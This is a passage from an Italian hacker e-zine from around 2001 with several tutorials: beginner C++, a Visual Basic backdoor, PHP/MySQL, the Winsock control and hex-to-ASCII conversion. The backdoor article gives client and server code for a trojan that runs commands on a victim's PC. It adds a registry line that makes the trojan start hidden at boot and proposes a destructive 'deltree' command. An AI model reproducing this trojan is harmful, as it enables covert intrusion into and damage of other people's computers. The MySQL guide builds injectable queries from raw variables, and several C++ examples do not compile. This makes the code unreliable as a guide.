in esso mancano diverse cose -marcatori come "delete" e "new"-,in più Java2 è
tutto strutturato ad oggetti).

Il C++ comprende una parte di programmazione ad oggetti,che qui non tratteremo.

Non commettete l'errore di considerarlo un linguaggio inutile:ogni linguaggio
dimostra la sua utilità se glielo permettete.


Il primo programmino che possiamo scrivere in C più più è il solito,trito e
ritrito,esempio che stampa sullo schermo il classico
"HEllo World":



#include <iostream.h>

void main() {

cout <<"Hello World!";

}



Spieghiamo meglio l'esempio:

- #include <> serve per includere le librerie standard del
linguaggio.Una libreria si potrebbe definire come
una parte

del nosto programma che non necessita di
essere scritta perchè è già stata "costruita".Questo

facilita di molto il nostro lavoro,e rende il
nostro listato più snello da vedere e da compilare.

- iostream.h E' la libreria standard che controlla il
flusso(streaming) di dati in ingresso(input) e in

uscita(output),quindi il nome per intero
dovrebbe essere "input-output-streaming".

- void main() { } Indica l'inizio della procedura(void)
principale(main).All'interno delle parentesi tonde possono essere
inseriti dei parametri (ad esempio "argv" o
"argc",ma a noi non interessa),mentre dentro le
graffe andrà il corpo del nostro
programma,variabili,costanti e cazzate varie.

- cout<<" " ; Questa istruzione dice al computer che cosa
stampare sullo schermo del nostro pc.All'interno
degli
apici compare il classico Hello World.Possiamo
concatenare più <<,in modo da permettere
l'inserimento sia di testo che di altri
elementi,come le variabili.Ad esempio:
cout<<"La variabile1 è " <<variabile1 <<"Capito o no?";
Infine possono essere presenti comandi per
la formattazione del testo,come:

- \n manda a capo

- \t tabulazione del testo

Per ora basta sapere questo
Alla fine dell'istruzione compare il punto
e virgola:ogni volta che finiremo di dichiarare una
variabile,termineremo un'istruzione o
definiremo un marcatore dovremo mettere il punto e
virgola,per dire al nostro pc che quel
comando è terminato.


E' possibile inserire all'interno del nostro listato anche dei commenti,che
non verranno visualizzati durante l'esecuzione del

programma e di per sè inutili allo scopo del programma,ma utili nel caso
quelli che visualizzeranno il sorgente non ci riescano a

capire una sega.I commenti possono essere:

-Di una sola linea.Iniziano con //
-Di più linee,Iniziano e finiscono con / * */

esempio:


#include<iostream.h>

void main() {

//questo è un commento su una linea

/ * Questo invece,come potrete notare,è un commento alla cazzo di
cane,perchè riempire due righe scrivendo cazzate assurde

non è una delle cose più facili al mondo.Ringrazio per la pazienza
*/

}


Che bello!Sono riuscito a scrivere un programma in C++!Wow! (idiota...)

PRima di esaltarci come cretini,vediamo di rendere l nostro programma un
pochino interattivo,altrimenti non ci serve ad un bel

cazzo...

Per rendere interattivo un programma dobbiamo iniziare a parlare di
variabili.Una variabile è,come dice il nome stesso,un elemento

che può assumere diversi valori,che possono essere assegnati dal programmatore
o da colui che utilizzarà il nostro programma.

Nel C++ esistono diversi tipi di variabili:


-Integer(int):è una variabile che definisce un numero intero
(1,40,555,10002934847475758,ecc...)

-Character(char):definisce un carattere battuto dalla tastiera

-Double(double):definisce una variabile con la virgola (2,1 , 32,234 ,
ecc...)
-Boolean(bool):particolare tipo di variabile con due valori possibili,TRUE e
FALSE
-Costante(const):variabile costante,cioè rimane tale per tutto il listato una
volta che viene dichiarata.


All'interno del nostro programma,una variabile si può dichiarare in due modi:


-"Implicitamente" : nome_variabile = valore es. variabile = 2

In questo caso il compilatore dovrebbe capire
da solo il tipo di variabile(in questo caso
Integer)

-"Esplicitamente" : tipo nome_variabile = valore es.double
variabile = 3.2


Ora viene definito esplicitamente il tipo della vaariabile (in questo caso
double)
Nel caso di una variabile costante,la sua dichiarazione avverrà in questo modo:

const tipo nome_variabile = valore es. const
int variabile = 2



Ma facciamo una prova:


#include <iostream.h>

void main() {

int prova = 4;
cout <<"Il numero di prova è :" << prova ;

}



Output:

Il numero di prova è : 4


E se volessimo compiere delle operazioni con le variabili?E' possibile anche
questo.Mettiamo di voler trovare la somma di due
variabili integer,ad esempio 4 e 2.Chiameremo la prima variabile addendo1 e la
seconda addendo2.Per trovare la loro somma dovremo

dichiarare una terza variabile,anch'essa integer,che per l'occasione
chiameremo somma,ed eseguire l'espressione di somma tra le

due variabili precedenti.Forse con un esempio la cosa si capisce meglio(è
sempre il vino):



#include <iostream.h>

void main() {

int addendo1 = 4; //dichiaro il primo addendo dell'operazione

int addendo2 = 2; //dichiaro il secondo

int somma = addendo1 + addendo2 ; //addizione tra i due addendi

cout <<"La somma tra " << addendo1 <<" e " << addendo2 <<" è "
<< somma; //stampa a video la somma dei due

}


Ora la cosa dovrebbe essere più chiara,però bisogna introdurre gli operatori
aritmetici del C++.

Nel C++ esistono i cosidetti "operatori aritmetici",che servono per compiere
operazioni tra numeri o variabili.

Gli operatori sono i seguenti:


+ addizione

- sottrazione

* moltiplicazione

/ divisione

++ incremento unitario

-- decremento unitario


Ma se noi volessimo che sia l'utente ad inserire i propri parametri delle
variabili?Ancora una volta la risposta è semplice (o
quasi):dobbiamo dichiarare una variabile senza inizializzarla,cioè creare una
variabile senza assegnarle un valore,perchè il
valore lo si assegnerà dopo,tramite un'apposito comando.

Per inserire un valore dall'esterno,occorre usare il comando "cin >>variabile"
(senza gli apici),dove variabile è il nome della
nostra variabile che vogliamo inserire.

Ed ecco il nostro esempio:



/ *Vogliamo creare un programma che ritorna una variabile che inseriamo noi */

#include <iostream.h>

void main() {

int numero;

cout <<"Inserisci un numero intero a caso:";

cin >>numero;

cout<<"\nIl numero inserito è :" <<numero;

}



E già ora possiamo permetterci di fare qualcosa di interessante:ad
esempio,voglio creare un programma che calcola la circonferenza
di un cerchio.Innanzitutto dobbiamo creare tre variabili:una per la misura del
raggio(raggio),una per il pi greco(pigreco) e una
per l'operazione da compiere tra raggio e pi greco(risultato).

Il pi greco vogliamo che sia una variabile costante,perchè il suo valore è
universale e non deve cambiare valore nel programma nè
dovrà farlo in caso di seguenti aggiunte nel listato.

La misura del raggio deve essere una variabile double,perchè una di tipo
int,char o bool non contempla l'uso di numeri con
virgola;e così sarà anche la variabile dell'operazione tra pi greco e raggio.



#include <iostream.h>

void main() {

const double pigreco = 3.14;

double raggio;

cout <<"Inserisci il raggio della circonferenza";

cin >>raggio;

double risultato = (raggio + raggio) * 3.14

cout <<"\nLa circonferenza è di " << risultato ;

}



Ellapeppa!!!Ma che cose che possiamo farci con questo bel Cippiùpiù!
Cretino!Devo ancora finire per oggi!Ascolta e taci per ora,poi fai il cazzo
che ti pare!
Che spiegazione sarebbe dei fondamentali del C++ se non mi soffermassi sui
costrutti ciclici "while...do" e quelli di scelta
condizionata "if...else" ?
Allora muoviamoci e proseguiamo che ho fretta di dormire.

Un costrutto ciclico è un costrutto(ma va?) che si ripete ciclicamente.Nel C++
esistono due tipi di costrutti ciclici:while...do

e for.Ora tratterò del primo,perchè per l'altro ci vorrebbe un poema.

Il costrutto while...do (dove "do" non è necessario,e infatti spiegherò solo
l'utilizzo di while senza do per essere più veloce)

è strutturato in questo modo:



while (condizione vera) {

esegui questo comando

}



Per utilizzare while occorre creare una variabile fittizia,ovvero una
variabile che non ha uno scopo per la funzionalità del
programma ma serve solo al ciclo while di disporre di una condizione vera.La
variabile fittizia si pone sempre diversa da 0,il
perchè ve lo dimostro ora:



#include <iostream.h>

void main() {

int a = 2; //viene posta la variabile fittizia pari a 2

while (a > 1) { / * la condizione di while per il verificarsi
dei comandi dentro le { } è che a sia
maggiore di
1.Quindi la
condizione è verificata,dato che a è uguale a 2
* /

//azioni da eseguire
}

}



Ora però sono costretto a fare un breve cenno sugli operatori
relazionali,cazzo...

Servono a paragonare diversi elementi,e possono essere:

== uguale a

< minore

> maggiore

<= minore uguale

>= maggiore uguale

!= diverso da



Ma precisamente a cosa mi può servire while?Bhè,una volta che avete terminato
di scrivere tutte le vostre operazioni che il
programma dovrà eseguire,può darsi che abbiate bisogno di:

-Bloccare il costrutto ciclico. Usate "break" (senza apici)

-Ricominciare dall'inizio il costrutto ciclico. Usate "continue" (senza
apici)


Un bell'esempio:



#include <iostream.h>

void main () {

int a = 2;

while (a > 1) {

cout <<"VAFFANCULO MANDO !!!";

continue | break
}

}


Capito vero?In caso contrario non me ne frega niente.

E per finire in bellezza parliamo brevemente dei costruttia di scelta
condizionata.In questa sede parlerò solo di if...else,e
tralascerò la scelta multipla(switch...case).
Un costrutto di scelta condizionata permette di compiere scelte che si
verificheranno nel caso un'espressione risulti vera.Il
costrutto if...else funziona nel seguente modo:



if (condizione vera) {

//operazioni varie

}

else {

//operazioni varie

}



Ad esempio,noi vogliamo che,se l'utente sceglie un numero che gli
indichiamo,si stampi sullo schermo una cosa diversa in base alla
scelta fatta:



#include <iostream.h>

void main() {

cout <<"Seleziona un numero: 1 o 2 ";

int numero; //dichiare la variabile numero

cin >>numero; //attende l'immissione della variabile
numero da parte dell'utente

if (numero == 1) { //se la condizione è vera...

cout <<"\nHai scelto 1!"; //...compi queste operazioni

}

else { //altrimenti...
cout <<"\nHai scelto 2!"; //..fai queste

}

}



All'interno del costrutto if...else (anche in questo caso else non è
obbligatorio) possono essere presenti altri costrutti di
scelta,il che rende le possibilità di scelta teoricamente infinite.

Bhè,con questo avrei finito con 'sto breve tutorial sul cipiùpiù.Spero sia
stato di vostro gradimento e che non facciate troppe
storie se mancano alcune parti.Il mio scopo era quello di fornire le basi per
un newbie che si volesse cimentare nell'impresa di
imparare questo bellissimo linguaggio.Sarebbe bello parlare anche della
programmazione ad oggetti del C++,ma bisognerebbe
introdurre elementi come puntatori,marcatori e roba del genere,che
sinceramente escono dallo scopo di questo tutz e non ho proprio
il tempo di scrivere perchè ho un sonno che stenderebbe una mandria di bufali
cafri.
Un saluto a tutti e Buon Natale e felice Anno Nuovo !


|----------------------------------------------------------------|
|Art. N° <19> : "Come farsi una bella backdoor in VB" di HolyHack|
|----------------------------------------------------------------|


COME FARSI UNA BELLA BACKDOOR IN "Visual Basic"

Autore.: HolYHaCk
E-mail.: holyhack@libero.it
mIRC.: irc.oltrelinux.com 6667 Nick.: HolyHack
Premessa.: prima di costruire questo strumento e meglio che leggiate una bella
guida sul controllo del Winsock.ocx

c:> type Backdoor.txt caricamento in corso.......

Bene ragazzi,questa è la mia prima guida che tratta lo studio e
l'approfondimento del Visual Basic quindi se avete domande o consigli da darmi
lo potete fare scrivendomi una Mail.

Prima di tutto una backdoor tradotta letteralmente significa "porta
posteriore"
che permette ad un utente estraneo di far visita al vostro PC
senza che voi non ve ne accorgiate.
Questo si divide in 2 file : il Client che serve per entrare nel pc della
vittima (una volta dato il server) e il server (cioè la backdoor).
La backdoor attiva sul pc remoto (quello della vittima) una porta che rimane
in as

  
colto e aspetta che voi vi colleghiate. ( in caso del NetBus la porta in
ascolto e la 1234).
La backdoor non fa altro che interpetrare una stringa di comando inviata da
voi, ESEMPIO: il server riceve la lettera Y che corrisponde ad una stringa X ,
quindi il messaggio "MUORI" inviato da voi al server può corrispondere a
"deltree /y c:\windows\system\*.sys" molto bello !! hehehehe....
Ecco come costruire un CLIENT che vi servirà per entrare nel pc della
vittima.Per prima cosa aprite il Visual Basic e inserite un Form + o - cosi:

___________________________________
| |
| |Inserire Ip vittima| |
| |
| |Inserire Porta| |Connetti| |
| |
| |Invia Messaggio| |Esegui Progr |
|__________________________________|

Bhè il disegno non è tanto preciso ma cmq ci siamo

Vi passo il codice sorgente del client:

Private Sub cmdConnetti_Click()
Winsock.RemoteHost = txtVittima.Text 'raccoglie i dati
Winsock.RemotePort = txtPorta.Text
Winsock.Connect 'Connette
End Sub

Private Sub cmdMandaMessaggio_Click() 'Invia Msg Box alla vittima
Winsock.SendData "mess" 'invia una stringa che verrà interpretata dal
server
End Sub

Private Sub cmdEsgui_Click() 'questo invece esegue programma (telnet.exe)
Winsock.SendData "esegui"
End Sub

=============================FINE=============================

Ok Ragazzi,siamo solo a metà guida,ci manca la costruzione del server, ovvio
che dipende tutto da lui !!

Prima di crearvi il vostro server accertatevi di scrivere prima di tutto " On
Error GoTo x "
per evitare che il programma si chiuda.

CODICE SERVER :

Private Sub Winsock_DataArrival(ByVal bytesTotal As Long)
Dim strData As String
Winsock.GetData strData, vbString
Select Case strData
Case Is = "mess"
MsgBox "Scrivi qua il msg da inviare alla vittima"
Case Is = "esegui"
Shell "telnet.exe", 1
End Select
End Sub

Ecco,sono bastate poche righe per capire il funzionamento di quasi tutti i
trojan. Se ci pensate bene anche i normali programmi come le chat funzionano
in questo modo.
Ora basta rendere il server invisibile alla vittima e farlo partire
automaticamente all'avvio di windows con questo comando :

Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan",
"wscript.exe c:\windows\backdoor.exe %"

(ammettendo che la backdoor si trova in c:\windows)

Bene, con questo ho finito, se ci sono domande o dubbi da chiarire come ho
detto prima scrivetemi una Mail a holyhack@libero.it.

26/12/001 ore: 23:31 quando finisco di scrivere questa Guida per "ELekTro"
EleKtro.: www.mondohackers.cjb.net [Commentino di Elektro: X-System.cjb.net
;))]


|--------------------------------------------------|
|Art. N° <20> : "Guida al MySQL con PHP" di Bigalex|
|--------------------------------------------------|


++++¤¤} Guida al MySQL con PHP {¤¤++++

Salve a tutti...dato che in tantissimi mi chiedevano
di scrivere una nuova guida (e-zines ecc ecc), ho
pensato di scrivere un tutorial su come utilizzare il
MySQL con il PHP. Il MySQL è un database che è possibile
interrogare dall'interno del codice PHP per rendere più
dinamiche le proprie pagine web. Ho deciso tuttavia di
scrivere il tutorial per tutti coloro che abbiano già un
minimo fondamento di PHP (il PHP è grande ed io nn ho
abbastanza tempo per trattarlo tutto :), anche perchè
esistono già moltissime guide che trattano del PHP, tuttavia
molto poche sono quelle che trattano del MySQL, ed ancor
di meno quelle che lo fanno in modo chiaro. Per questo ho
quindi deciso di scrivere questo tutorial.



++++¤¤} Comandi basilari del MySQL {¤¤++++

Prima di pensare ai comandi basilari del MySQL, dovreste
conoscere la struttura: in pratica un database contiene
delle 'tabelle' che a loro volta contengono 'righe' e 'colonne'.
Non è possibile scrivere in un database se prima non si
costruisce una tabella ed, all'interno della tabella, delle
colonne. Le righe possono essere inserite dal PHP quando
l'utente che visita un determinato sito web decide ad esempio
di registrarsi al sito, inviando i propri dati che vengono appunto
salvati in delle righe.
Se non sapete come costruire tabelle, vi rimando alla guida
di MySQL o allo script di gestione dei database PHPMyAdmin,
ottimo per la configurazione dei database in locale ed in remoto.
Passiamo ora ai comandi di base del MySQL.

I comandi di base del MySQL sono pochi: quelli che
occorrono per inserire righe, modificarle ed eliminarle.
Un altro comando indispensabile, è SELECT. Vedremo anche l'
utilizzo di quest'ultimo.

Per inserire una riga occorre richiamare il comando INSERT INTO.
Ad esempio, vogliamo inserire due variabili nella tabella 'utenti'
che contiene due colonne: 'user' e 'pass'. Le variabili che voglio
inserire sono $user e $pass.
Il comando da lanciare sarà

INSERT INTO utenti (user, pass) VALUES ('$user', '$pass');
(nel PHP non occorre inserire il ; dato che viene fatto in
automatico. Se inserite un ; riceverete un errore e probabilmente
si bloccherà l'esecuzione dello script).

Per modificare una riga (che quindi già esiste), dovete usare
il comando UPDATE. Mettiamo ad esempio che io abbia una tabella
chiamata 'utenti' che abbia all'interno tre colonne: user email e
pass. L'utente vuole modificare l'email e la password. Abbiamo così
tre variabili: $user, $email e $pass. Lanciamo quindi il comando
per aggiornare il nostro database:

UPDATE utenti (email, pass) SET ('$email', '$pass') WHERE user = '$user';

In questo modo sostituiremo la vecchia password e la vecchia email
con i nuovi dati fornitici dall'utente. (Il WHERE verrà trattato
in seguito)

Per eliminare una riga, utilizzeremo invece il comando DELETE.
Per utilizzare il comando DELETE, come anche con UPDATE, abbiamo
bisogno di una variabile che indichi al database quale riga
eliminare, quella che quindi passeremo a 'WHERE', cioè la
condizione con la quale il database può decidere se eliminare o
meno una determinata riga. In questo caso, utilizzeremo la variabile
$user, che corrisponde alla colonna user della tabella utenti
(il nome utente in genere è unico e quindi dovremmo essere sicuri
di eliminare un unico valore, quello legato a quell'utente).
Il comando da utilizzare sarà quindi:

DELETE FROM utenti WHERE user = '$user';

In questo modo tutte le righe con il valore user coincidente con
la variabile $user verranno eliminate.

Passiamo ora al comando SELECT: questo comando serve a visualizzare
delle righe, in modo da poter ad esempio leggere username e pass per
poter effettuare un login. Mettiamo ad esempio di voler leggere
i valori di tutte le colonne (*) della tabella utenti (e dato che
non utilizziamo la condizione, cioè WHERE, ci verranno proposte anche
tutte le righe). Dovremo quindi utilizzare il comando

SELECT * FROM utenti;

In questo modo riceveremo in una variabile PHP tutte le righe con tutti
i valori della tabella utenti.
Nel caso in cui volessimo prendere un solo account, possiamo invece
usare la condizione WHERE user = '$user'. Vediamo cosa accade:

SELECT * FROM utenti WHERE user = '$user';

In questo modo riceveremo tutte i valori di tutte le righe che hanno
nella colonna user il valore della variabile $user.

Vediamo ora invece com'è possibile inviare con il PHP le query
che permettono di inserire, modificare, cancellare e visualizzare
righe.


+++¤¤} I comandi PHP per MySQL {¤¤+++

I comandi per utilizzare i database sono relativamente pochi:
il primo, il più facile e quello più importante è quello
relativo alla connessione al database (eheh). Il comando
da inserire nel PHP è mysql_connect(host, user, pass).
Con questo comando ci colleghiamo quindi ad un server
con hostname (o ip) 'host', nome utente 'user' e password 'pass'.
Faccio subito un esempio:

mysql_connect("localhost", "bigalex", "ciauzz");

Fatto questo, se il login e l'hostname sono corretti mi collego
ad un server. Per controllare l'avvenuta connessione, il PHP
può creare una variabile in cui imposta valore 1 se la
connessione ha avuto successo, altrimenti valore nullo.
Per controllare, quindi posso fare così:

$var = mysql_connect("localhost", "bigalex", "ciauzz");

Per controllare l'avvenuta connessione aggiungo una riga...

if (!$var) { echo "Impossibile collegarsi al database"; exit; }

Et voilà...se non si collega, esce dallo script avvisandomi.
Continuiamo il nostro tour nel mondo del MySQL :)

Il secondo comando (fondamentale) è mysql_select_db(database).
Questo comando ci consente di selezionare un database su cui
operare. Per selezionare un database, basta richiamare il
comando inviando come variabile database, il nome del nostro
database, un esempio rapido di questo comando è mysql_select_db("prova");

Passiamo ancora avanti...ora possiamo fare una query al database.
Il comando per eseguirla è mysql_query(sql);
Questo comando restituisce una variabile con il risultato
della query (ad esempio con $result = mysql_query($sql); abbiamo
in $result il risultato della query).
Proviamo subito a fare una semplice query. Avendo un database
chiamato prova ed una tabella chiamata utenti con all'interno
due campi: user e pass. E'sottointeso che nel database ci debbano
essere delle righe, altrimenti non possiamo richiedere alcun valore! :)
Ad esempio, un utente si è registrato col nick bigalex. Vogliamo
vedere la sua password per effettuare il login.

mysql_connect("localhost", "username", "password");
/* essendo in localhost è praticamente sicuro che
avvenga la connessione :) */

mysql_select_db("prova");
$result = mysql_query("SELECT * FROM utenti WHERE nick = 'bigalex'");

Abbiamo ora il risultato nella variabile $result. Fin qui tutto ok,
ma come facciamo a leggerlo? Facendo echo $result non è possibile
essendo un risultato di una query MySQL. Come si fa allora? E beh
si utilizza un comando del PHP per leggere le variabili in MySQL, no? ;D
ihihih...allora...per leggere i risultati delle query di MySQL basta
usare il comando mysql_fetch_row(result). Questo comando restituisce
un array con tutti i campi selezionati (in questo caso *, quindi tutti).
Un esempio:

$row = mysql_fetch_row($result);

Avremo quindi in $row tutte le colonne richieste nella query. Nel
caso in cui le righe siano più di una, bisogna richiedere per
ogni riga un mysql_fetch_row. Procediamo con un esempio:

// esistono più righe nel risultato $result!

while ($row = mysql_fetch_row($result))
{
echo "$row[0] -> $row[1]<br>\n";
}

In questo modo per ogni riga ci verrà mostrato la prima colonna, una
freccia, e la seconda colonna.

Nel caso in cui vogliamo invece inserire, modificare o cancellare
delle righe, ci possiamo affidare al comando mysql_query.
Questo comando infatti non consente solo di mostrare delle righe, ma
di fare query di qualsiasi genere.

Una volta fatta una query ed ottenuta una variabile (mettiamo ad
esempio $result), possiamo vedere se la query ha avuto effetto
su una o più righe (ci viene dato il numero esatto delle righe
sulle quali ha avuto effetto quella query).
Procediamo sempre con un esempio:

// dopo aver avuto $result

echo "La query ha avuto effetto su " . mysql_affected_rows();

Questo comando tuttavia non vale per il comando SELECT. Per
quest'ultimo bisogna usare mysql_num_rows($result).
Volendo è possibile assegnare ad una variabile il risultato
dei 2 comandi e verificare semplicemente che il valore sia maggiore
di 0, in modo da verificare l'avvenuto aggiornamento senza badare
al numero di righe su cui ha avuto effetto la query.
Per essere più chiaro faccio un esempio:

$num_righe = mysql_num_rows();
if ($num_righe > 0) echo "Il comando ha avuto effetto";
else echo "Il comando non ha avuto effetto";

Con questo termino il tutorial, ricordandovi di chiudere la connessione
al database con mysql_close();

Nota dell'ultimo minuto: nella costruzione del mio sito, ho avuto dei
problemi con le virgolette: se ci fate caso, inserendo una virgoletta
in un INSERT INTO si possono avere vari problemi di sicurezza, anche
seri!! Per questa ragione i coders del PHP hanno inserito un comando
mooolto utile per tutti coloro che giocano come noi con i database :)
Il comando è addslashes e funziona nel seguente modo:
bisogna assegnare ad una variabile il risultato del richiamo di
addslashes(variabile). Il risultato sarà compatibile con il MySQL.
Esempio:

$variabile = addslashes($variabile);

In questo modo aggiungiamo semplicemente dei backslash prima delle
virgolette, degli apostrofi e dei backslash, aggiornando la variabile
$variabile con il nuovo codice compatibile con MySQL.
Esempio pratico:

$variabile = "abc c'è \\comp";
$variabile = addslashes($variabile);
echo $variabile; //ora $variabile sarà diventata "abc c\'è \\\\comp"


++++¤¤} Saluti {¤¤++++

In un tutorial può mancare tutto, tranne che i saluti :)
Allora, cominciamo dai tank commandos, mighty, il nuovo arrivato ValK,
spyro, e tutti gli altri ke nn vedo mai, poi, marsio, la #noflyzone,
goliath, aladdin, an4chr0n (ringraziandolo x il logo in flash 5 x
il mio sito), blacksoul, dionakra, crashes, e4m, quasar, raptor,
shisha, [elektro], sindon2k (che sta facendo il militare), thegass,
x[morph]x, holaz, `advanced, delilah, xpterminator, mezzomatto,
_kome_, {kurt} ed omega (iihih, chi nn c'era qua, nn c'era neppure
nei log del mirc ;D )

Per eventuali chiarimenti mi trovate in chat su azzurranet al canale
#hack o alla mail totalmeltdown@libero.it

byezz all!

--
BiGAlex
Everyday is a strike 4 my head!
E-Mail: totalmeltdown@libero.it
SiTE: bigalex.cjb.net (f2s sucks!!!)


|------------------------------------------|
|Art. N° <21> : "How to use Winsock" di e4m|
|------------------------------------------|


__________________________________________________________________
|"*"|Coded by e4m____________________________________________|*|-|x|
|101010101010101010101010101010101010101010101010101010101010101010|
|010101010101010101010101010101010101010101010101010101010101010101|
|010101010101010111010101001000100010100100101001010101010410101010|
|10| \ 01010101 / \101010101/ \/ \01000|
|10| ________| 01010101/ /| |01010101/ \1011|
|10| |________ 010101 / /0| |0101010| /\ /\ |100|
|01| | 101011/ /01| |0101010| /0 \ /01\ |110|
|10| ________| 10100/ /010| |0101010| |01 \/010 | |010|
|01| |0101010110101/ /0100| |0101001| |010101010| |110|
|01| |01010101010_/ \0110| \____ | |010101010| |011|_____
|10| |/ \ | \01010101/ |100|!!!!/
|01|______________/|_______ ___________||_____\010101/_____|011|!!!/
|011010010101010101011101010| |010101001010101010101010101010101|!!/
|010101011010101100100101010| |010101010101010101010101010101010|!/
|010010100101001010010101001|____|010101011101010101010101001101010|/
--------------------------------------------------------------------

|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/ Riecco quel coglione di e4m...
\---.|\ |\./| /|.---/ <---Maria,la mia nuova fidanzata!
\--.|\ |\./| /|.--/ bahuauhahahahhaah
\ .\ |.| /. / AVEVO RAGIONE!!! :D
_ -_^_^_^_- \ \\ // / -_^_^_^_- _ by e 4 m
- -/_/_/- ^ ^ | ^ ^ -\_\_\- -
_____________________________________________________________________________

CIAO,FANS E FANSE! :) ALLORA TUTTO OK? QUEST'OGGI,VISTO KE NON HO UN CAZZO DA
FARE...,
SCRIVERO UN BEL TUTE , KISSA' SE LA CREW SI RIMETTE A POSTO...FORSE PASSEREMO
QUESTO TUTE
SULL'E-ZINE ... KE FINE FARA'??? BHOO!!!!
VI SEMBRA ORA D'INIZIARE? OK..OK NON MI PRENDETE A PAROLACCE,INIZIO SUBITO!!
SE FARO' ERRORI (IL ke sara' molto probabile,non reclamate e cercate di
capire)!!!
------------------------------------------------------------------------------
Un saluto a tutta la mia crew B l a c k F o r c e VENITECI A TROVARE SIAMO
SU AZZURRA
#bfc ihih :)..
Bene bene UN saluto (ANZi ADDIO) AL MITIKO MARSIO ke essendo stato sgamato
dopo un
sabotaggio ad un ftp di un governo amerikano ha deciso di abbandonarci per un
bel po!
salUTO AL mItiCoP RESINARO ihih abbiamo un fattore comune, mangiamo toast
davanti al picci',
saluto a FAT|MIKE per la musika slash per la sua stupidaggine Gioker84 x
trukki col vb,lui e' il genio, e a tuttE quelle e Quelli ke mi conoscono ;)
-------------------------------------------------------------------------------
BENE BENE!
oggi parleremo del..

C o n t r o l l o W i n s o c k d e l [V i s u a l B a s i c]

Il controllo Winsock è stato integrato nel linguaggio Visual Basic per gestire
la comunicazione tra due computer mediante il protocollo TCP/IP. La
comunicazione avviene tra due computer, chiamati rispettivamente Client e
Server. Il Server deve stare sempre collegato e deve attendere che il Client
richieda informazioni. Il controllo è contenuto nel file MSWINSCK.OCX e per
usarlo si deve caricare prima nella finestra dei controlli Visual Basic.

Prima di iniziare a modificare le proprietà, è bene scegliere tra due diversi
tipi di comunicazione:

sckTCPProtocol. Il controllo Winsock opera in modalità TCP (Transmission
Control Protocol)
sckUBPProtocol. Il controllo opera in modalità UDP (User Datagram Protocol)
Esso è un controllo di tipo invisibile.


Di seguito sono riportate tutte le proprietà del controllo :D

Proprietà BytesReceived

Restituisce o imposta un valore di tipo Long Integer che indica il numero di
bytepresenti nel buffer di ricezione.

Proprietà LocalHostName

Restituisce o imposta il nome del sistema Host locale su cui è in esecuzione
l'applicazione. Il valore è di tipo String.

Proprietà LocalIP

La proprietà LocalIP restituisce o imposta un valore di tipo String che indica
l'indirizzo IP del sistema Host locale. Il formato è il seguente:
nnn.nnn.nnn.nnn dove n è una cifra.

Proprietà LocalPort

Questa proprietà restituisce o imposta un valore del tipo Long Integer
indicante il numero della porta del sistema Host locale.

Proprietà Protocol

La proprietà Protocol imposta o restituisce il protocollo TCP/IP o UDP. Se il
valore della proprietà è impostato a 1 allora si sta utilizzando una
connessione sckUDPProtocol, se invece è 0 sckTCPProtocol.

Proprietà RemoteHost

Questa proprietà restituisce o imposta il nome del computer remoto con il
quale si vuole stabilire una connessione. Il valore è di tipo String e può
essere specificato come indirizzo IP (209.304.231.98) o come DNS
(www.sitop.it).

Proprietà RemotePort

La proprietà RemotePort restituisce o imposta un valore del tipo Long Integer
che specifica il numero della porta del computer remoto su cui si è connessi.

Proprietà State

Questa proprietà indica lo stato della connessione. Ecco i valori restituiti e
il rispettivo significato:

Valore Descrizione
0 Chiuso
1 Aperto
2 In ascolto
3 In attesa di connessione
4 Risoluzione dell'host
5 Risoluzione dell'host completata
6 Connessione in corso
7 Connessione completata
8 Connessione in chiusura
9 Errore

Se questa guida non vi e' servita ad un tubo apritevi l'allegato a questo tute
e PROVATELO !!


[E4M]
TEZKATLIPOKA@LIBERO.IT
MEMBERZ OF #BFC
WWW.BFC.TOO.IT
UN BACIONE DA E4M ;)
....

NOPE... NON SONO GAY...BRUTTO FIGLIO DI PU.... :)
ALLA PROXYMA.


|---------------------------------------|
|Art. N° <22> : "Hex 2 Ascii" di BiGAlex|
|---------------------------------------|


++++¤¤} Hex 2 ascii {¤¤++++


Salve a tutti, è la vigilia di natale ed io,
non avendo nulla da fare, ho deciso di scrivere
un tutorial sulla conversione di ascii in hex
e vice-versa.
La prima cosa da dire è che entrambi, hanno gli
stessi caratteri, se così vogliamo dire: essi
sono 256. Con un algoritmo, è possibile
convertire l'ascii in hex e vice-versa. Come
fare? Semplice. I caratteri dell'hex sono nel
formato FF, mentre quelli dell'ascii (cioè del
codice ascii) sono numerici fino a 255 (da 0 a
255). L'hex, cominciando da 00 e finendo a FF,
facendo brevi calcoli, notiamo quindi che (mica
sparo palle! :) ha 256 caratteri. Per incrementare
il codice hex, bisogna aumentare dapprima la cifra
di destra, poi quella di sinistra. Arrivando ad F,
cambierà poi quella di sinistra. Un esempio:

00, 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B,
0C, 0D, 0E, 0F, 10.

Capito? Semplice, no?
Ora..mettiamo di voler fare un programma che
converta l'ascii in hex. Dobbiamo prendere il
codice ascii (mettiamo 213), dividerlo per 16
(cioè un singolo carattere hex, ad es D). Fatto
ciò otterremo il numero di sinistra (se maggiore
di nove, cioè da dieci in poi, bisogna trasformarlo
in lettera. Ciò solo fino a 15, cioè, da 10 a 15
bisogna sostituire da A a F). Per ottenere il numero
di destra, bisogna trovare il resto della precedente
divisione. Anche per il resto, bisogna trasformare
i numeri da 10 a 15 nelle lettere da A a F.
Molti linguaggi di programmazione permettono con
una funzione di ottenere come risultato di una
divisione un numero intero (in visual basic \) ed
il resto di una divisione (in visual basic mod).

Nel caso in cui vogliate invece trasformare un hex
in ascii, il calcolo è più semplice. Bisogna
prendere la cifra di sinistra, moltiplicarla per 16,
sommare ad essa la cifra di destra..ed otteniamo
il suo codice ascii (devo dirvi di sostituire alle
lettere i numeri? :)

Tutto chiaro? Se no, vengo a casa vostra e vi prendo
a sprangate ;D

Ciauzz a tutti...specialmente la UIHA, DoS, i TCC
e tutte le crew in cui sono (non le ricordo tutte, cazzo
(-:)E (uomo coi capelli appizzati ihihih :)

Bye allz by BiGAlex!

--
BiGAlex
Ascolta anche tu radio marja!
E-Mail: totalmeltdown@libero.it
SiTE: bigalex.cjb.net
DATE: 24/12/2001


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|-----------------------------|1ð01¶01<01010\10101£0
